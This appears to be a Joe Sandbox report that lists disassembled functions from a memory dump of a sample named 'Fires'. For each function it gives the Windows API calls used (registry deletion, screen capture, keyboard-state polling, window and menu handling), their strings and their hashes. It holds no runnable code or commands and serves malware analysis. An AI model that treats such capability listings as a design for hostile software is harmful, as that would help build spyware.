Function 00DD8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DD66D6,?,?), ref: 00DD8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD9016
GlobalLock.KERNEL32(00000000), ref: 00DD9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD9033
GlobalUnlock.KERNEL32(00000000), ref: 00DD903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DD66D6,?,?,00000000,?), ref: 00DD9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00DE0C04,?), ref: 00DD906D
GlobalFree.KERNEL32(00000000), ref: 00DD907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00DD909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00DD90CD
DeleteObject.GDI32(00000000), ref: 00DD90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DD910B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ac7fd802b7439e1e54cd836f718b7b5076e68cf92faaaef532a6e77cf0cdb7e6
Instruction ID: 698d2b1bc56c06b7f422603065452115bf8eab274d702c8c651cd9e8077ef2db
Opcode Fuzzy Hash: ac7fd802b7439e1e54cd836f718b7b5076e68cf92faaaef532a6e77cf0cdb7e6
Instruction Fuzzy Hash: 29413771601308BFDB119FA5DC88EAABBB9EF89711F14805AF905E73A0D7319941CB30

Function 00DCC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DCC10E,?,?), ref: 00DCD415
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD451
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4C8
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DCC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DCC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00DCC26A
RegCloseKey.ADVAPI32(?), ref: 00DCC2DE
RegCloseKey.ADVAPI32(?), ref: 00DCC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DCC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DCC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00DCC382
FreeLibrary.KERNEL32(00000000), ref: 00DCC3E3
RegCloseKey.ADVAPI32(00000000), ref: 00DCC3F4

Strings

RegDeleteKeyExW, xrefs: 00DCC35E
advapi32.dll, xrefs: 00DCC34D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: f91853aadce521aace4e7bff7c2e70f7ddbe45e6e0a57462a5b6c05eea25dd2e
Instruction ID: 4f99500f4e55ee3f8eb017950dddab508c40c1a84ec4bf9039cfbc886a511ef6
Opcode Fuzzy Hash: f91853aadce521aace4e7bff7c2e70f7ddbe45e6e0a57462a5b6c05eea25dd2e
Instruction Fuzzy Hash: 27C15B34214342AFD710DF14C895F2ABBE1FF84314F18959DE59A8B2A2CB71ED46CBA1

Function 00DDA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

GetSystemMetrics.USER32(0000000F), ref: 00DDA990
GetSystemMetrics.USER32(00000011), ref: 00DDA9A7
GetSystemMetrics.USER32(00000004), ref: 00DDA9B3
GetSystemMetrics.USER32(0000000F), ref: 00DDA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00DDAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DDAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DDAC54
ShowWindow.USER32(00000003,00000000), ref: 00DDAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00DDAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00DDACBB

Strings

@, xrefs: 00DDABD0
(, xrefs: 00DDA95B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(
API String ID: 3962739598-2721164788
Opcode ID: efb440af6ea63120ce424698f9e96b3b4317884e6813d5f36d27aa1f5149a749
Instruction ID: 201cbe2841ecebabde8f4b15290eb020523ca67dd2d4c19d08232e9f06b7d654
Opcode Fuzzy Hash: efb440af6ea63120ce424698f9e96b3b4317884e6813d5f36d27aa1f5149a749
Instruction Fuzzy Hash: A3B17735600219EFDF14CF6DC9847AE7BB2FF44710F19C06AED49AA295D770A980CB62

Function 00DD976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DD97B6
GetFocus.USER32 ref: 00DD97C6
GetDlgCtrlID.USER32(00000000), ref: 00DD97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00DD9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00DD992B
GetMenuItemCount.USER32(?), ref: 00DD9948
GetMenuItemID.USER32(?,00000000), ref: 00DD9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00DD998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DD99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DD99FD

Strings

(, xrefs: 00DD9779
0, xrefs: 00DD98FB

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(
API String ID: 1026556194-1385328161
Opcode ID: 4b8c68e2c0c010cb02cd94ba963cdca24a99fa825b307c5091d6ca519e5386c8
Instruction ID: eb190f0240bea9b3649d4ec7d673921267de0c4e44e04ceed3c861ac90130ada
Opcode Fuzzy Hash: 4b8c68e2c0c010cb02cd94ba963cdca24a99fa825b307c5091d6ca519e5386c8
Instruction Fuzzy Hash: 5F81AC71604341AFDB10CF24D894AABBBE8FB89714F04091EF985A7391DB32D905DBB2

Function 00DC2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DC3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DC3045
CreateCompatibleDC.GDI32(?), ref: 00DC3051
SelectObject.GDI32(00000000,?), ref: 00DC305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DC30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DC3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DC312D
SelectObject.GDI32(?,?), ref: 00DC3135
DeleteObject.GDI32(?), ref: 00DC313E
DeleteDC.GDI32(?), ref: 00DC3145
ReleaseDC.USER32(00000000,?), ref: 00DC3150

Strings

(, xrefs: 00DC30EA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 2f6d7be1562d136eda06293043cfc5e1644331662a3e05499df3bf4047fb7810
Instruction ID: a036c2315e6040b7ba92fe67edaccbbd884b090c88e9c6d6353a86363116df0d
Opcode Fuzzy Hash: 2f6d7be1562d136eda06293043cfc5e1644331662a3e05499df3bf4047fb7810
Instruction Fuzzy Hash: 6261D275D01319AFCF04CFA4D884EAEBBB6FF48310F20851AE555A7250D771A941DFA0

Function 00DA52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00DA52E6
GetWindowTextW.USER32(?,?,00000400), ref: 00DA5328
_wcslen.LIBCMT ref: 00DA5339
CharUpperBuffW.USER32(?,00000000), ref: 00DA5345
_wcsstr.LIBVCRUNTIME ref: 00DA537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00DA53B2
GetWindowTextW.USER32(?,?,00000400), ref: 00DA53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00DA5445
GetClassNameW.USER32(?,?,00000400), ref: 00DA5477
GetWindowRect.USER32(?,?), ref: 00DA54EF

Strings

ThumbnailClass, xrefs: 00DA53BD, 00DA5450

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 397cf1295d58071fbee99e9a12c78fa3a9ebf5256e3055c51ba84cb0373c7132
Instruction ID: 79c69393c7df5f6d4192ad6b8bdb971a0db1b317da27af97ef2da2002421caba
Opcode Fuzzy Hash: 397cf1295d58071fbee99e9a12c78fa3a9ebf5256e3055c51ba84cb0373c7132
Instruction Fuzzy Hash: 3E912671104B06EFDB08CF24E894BAAB7A9FF46300F184519FA8682194EB31ED55CBB1

Function 00DAC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00E129C0,000000FF,00000000,00000030), ref: 00DAC973
SetMenuItemInfoW.USER32(00E129C0,00000004,00000000,00000030), ref: 00DAC9A8
Sleep.KERNEL32(000001F4), ref: 00DAC9BA
GetMenuItemCount.USER32(?), ref: 00DACA00
GetMenuItemID.USER32(?,00000000), ref: 00DACA1D
GetMenuItemID.USER32(?,-00000001), ref: 00DACA49
GetMenuItemID.USER32(?,?), ref: 00DACA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DACAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DACAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DACB0C

Strings

0, xrefs: 00DAC904

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: f2a0caf69211bd120bc5133c59a03af984bd1bb4cf0a14ea0afa0038ecfd58f8
Instruction ID: 1b0681387513b3c3b8c5a902a1bcda0f4c332ed1a7f465850281bbf4a3d69d77
Opcode Fuzzy Hash: f2a0caf69211bd120bc5133c59a03af984bd1bb4cf0a14ea0afa0038ecfd58f8
Instruction Fuzzy Hash: EA61BF70A2024AAFDF11CF68DC88AFE7BA9FB06364F081015E951A3291D731AD04CB70

Function 00DAE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DAE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DAE4FA
_wcslen.LIBCMT ref: 00DAE504
_wcsstr.LIBVCRUNTIME ref: 00DAE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DAE570

Strings

\VarFileInfo\Translation, xrefs: 00DAE568
DefaultLangCodepage, xrefs: 00DAE5D3
StringFileInfo\, xrefs: 00DAE543
%u.%u.%u.%u, xrefs: 00DAE64E
04090000, xrefs: 00DAE5A6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 2cec02603c4769cf9e069e0d8ebb478d15dbbd10c243d7dbe40f3927abcaacab
Instruction ID: 1f7d8dd293ede8ebec251ec8a21bd09057142a2714d985861a9c8e5718afa601
Opcode Fuzzy Hash: 2cec02603c4769cf9e069e0d8ebb478d15dbbd10c243d7dbe40f3927abcaacab
Instruction Fuzzy Hash: 3841F272A403147BEB00AB649C47EBF77ACDF56710F14046AF901E62C2EB74EA01D2B5

Function 00DCD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DCD6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DCD6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DCD7A8

Part of subcall function 00DCD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DCD70A
Part of subcall function 00DCD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DCD71D
Part of subcall function 00DCD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DCD72F
Part of subcall function 00DCD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DCD765
Part of subcall function 00DCD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DCD788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00DCD753

Strings

RegDeleteKeyExW, xrefs: 00DCD729
advapi32.dll, xrefs: 00DCD718

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 5ace8b5340ee5d435caa24d0fab2e9f34d26a593a2d2a7b782d8cba15e3e045d
Instruction ID: 96184bdbbc7213c84ae0353d0c65e7213728a984a8514200b1601eadab3dcc83
Opcode Fuzzy Hash: 5ace8b5340ee5d435caa24d0fab2e9f34d26a593a2d2a7b782d8cba15e3e045d
Instruction Fuzzy Hash: 8E316371942229BBDB219F50DC88EFF7B7EEF45710F040169B806E3240DB349E469AB0

Function 00DAEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00DAEFCB

Part of subcall function 00D5F215: timeGetTime.WINMM(?,?,00DAEFEB), ref: 00D5F219

Sleep.KERNEL32(0000000A), ref: 00DAEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00DAF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DAF03E
SetActiveWindow.USER32 ref: 00DAF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DAF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00DAF08A
Sleep.KERNEL32(000000FA), ref: 00DAF095
IsWindow.USER32 ref: 00DAF0A1
EndDialog.USER32(00000000), ref: 00DAF0B2

Strings

BUTTON, xrefs: 00DAF030

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 5bae37d63f79f7b8d0204bb7b94d95b8023c56baa3c0d8182e897ede4b5e0b17
Instruction ID: 10da0729e7ba272df646338816111cb678377b7f7e1c546d0c97a372ec332419
Opcode Fuzzy Hash: 5bae37d63f79f7b8d0204bb7b94d95b8023c56baa3c0d8182e897ede4b5e0b17
Instruction Fuzzy Hash: 5D21D571141305BFEB11AF71EC89B667B6AFB4A745F04406AF502E2372CB719C48C675

Function 00DAF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DAF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DAF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DAF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DAF3BE

Strings

close PlayMe, xrefs: 00DAF385, 00DAF3B2
open , xrefs: 00DAF323
play PlayMe wait, xrefs: 00DAF3A8
play PlayMe, xrefs: 00DAF3B9
status PlayMe mode, xrefs: 00DAF36F
alias PlayMe, xrefs: 00DAF34D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 9ec54e557309f6f043d34fb7add176e784c8a216407411b48f9065a59693a13f
Instruction ID: eaf7d998aec9cc44af2209cc10355e1f68ff286315130d6c37a6e448d91a7b11
Opcode Fuzzy Hash: 9ec54e557309f6f043d34fb7add176e784c8a216407411b48f9065a59693a13f
Instruction Fuzzy Hash: 6511C671E902597ADB20A7A5CC4AEFF7B7CEFD2B00F40146AB441F20D1EAA06D85C5B1

Function 00DAA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DAA9D9
SetKeyboardState.USER32(?), ref: 00DAAA44
GetAsyncKeyState.USER32(000000A0), ref: 00DAAA64
GetKeyState.USER32(000000A0), ref: 00DAAA7B
GetAsyncKeyState.USER32(000000A1), ref: 00DAAAAA
GetKeyState.USER32(000000A1), ref: 00DAAABB
GetAsyncKeyState.USER32(00000011), ref: 00DAAAE7
GetKeyState.USER32(00000011), ref: 00DAAAF5
GetAsyncKeyState.USER32(00000012), ref: 00DAAB1E
GetKeyState.USER32(00000012), ref: 00DAAB2C
GetAsyncKeyState.USER32(0000005B), ref: 00DAAB55
GetKeyState.USER32(0000005B), ref: 00DAAB63

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3f9b3e17e87f4ec376c0f08df6fcf98fdd9a645d43dc2f85a663cdce894abda5
Instruction ID: ca0705d4402960f7b0d3737b614cdef95100d62aa8a89ee2c255bbda8a9bcfca
Opcode Fuzzy Hash: 3f9b3e17e87f4ec376c0f08df6fcf98fdd9a645d43dc2f85a663cdce894abda5
Instruction Fuzzy Hash: 4851B460A0478429EB35DBB88950BAABFF59F13350F4C469E85C25B1C2DB649B4CCB72

Function 00DA662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00DA6649
GetWindowRect.USER32(00000000,?), ref: 00DA6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DA66C0
GetDlgItem.USER32(?,00000002), ref: 00DA66D0
GetWindowRect.USER32(00000000,?), ref: 00DA66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DA6736
GetDlgItem.USER32(?,000003E9), ref: 00DA6744
GetWindowRect.USER32(00000000,?), ref: 00DA6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DA6798
GetDlgItem.USER32(?,000003EA), ref: 00DA67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DA67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00DA67CE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
